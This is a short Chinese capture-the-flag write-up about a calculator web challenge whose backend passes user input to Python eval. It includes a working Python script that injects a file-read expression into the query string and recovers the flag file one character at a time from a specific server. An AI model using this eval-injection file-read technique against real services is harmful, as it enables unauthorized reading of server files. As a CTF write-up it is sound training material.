>
>
萌新赛-数学及格了
yuchoxuuan
点开,是个计算器,
于是f12以下,看看是纯js还是有后台的,如果是纯js我就放弃了,因为我有js恐惧症
点1+1= 发现有流量
地址是酱紫的
于是开始愉快的玩耍
比如有枣没枣打一竿子的'
然后发现报错了,而且是python的。。。
eval。。感觉有搞头,不知道他前面过滤的咋样,经尝试,a,b首位必须是数字。。。其他很宽松
于是我试了试有没有读文件的权限。
因为前后左右都是数字,所以试验了一下得到的报错是 没有这个文件
这证明。。。其实是有读文件权限的。
从报错里面找到当前文件夹
然后再试一下,不行就要想办法import os了
卧槽,居然成功了。。。
然后就把这20个字符读出来就好了呀
屡一下啊 这个pl可以总结为
?number1=1*(我回头构造的数字)
&operator=%2B (+)
&number2=0
然后上代码
def get(url=''): return requests.get(url).text
for i in range(20):
url = 'http://124.156.121.112:5000/_calculate?number1=1*ord(open("/home/ctf/web/flag").read()[%d])&operator=%%2B&number2=0'%i
c = get(url).replace('{','').replace('"result":','').replace('}','').replace(' ','').replace('\n','')
print(chr(int(c)),end='')
群主的爱好昭然若揭。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论